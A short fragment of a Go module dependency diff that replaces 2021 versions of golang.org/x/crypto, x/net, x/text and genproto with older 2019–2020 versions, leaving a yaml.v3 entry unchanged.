golang.org/x/crypto v0.0.0-20210415154028-4f45737414dc - golang.org/x/net v0.0.0-20210420072503-d25e30425868 - golang.org/x/text v0.3.6 - google.golang.org/genproto v0.0.0-20210416161957-9910b6c460de + golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c + golang.org/x/net v0.0.0-20200301022130-244492dfa37a + golang.org/x/text v0.3.2 + google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b )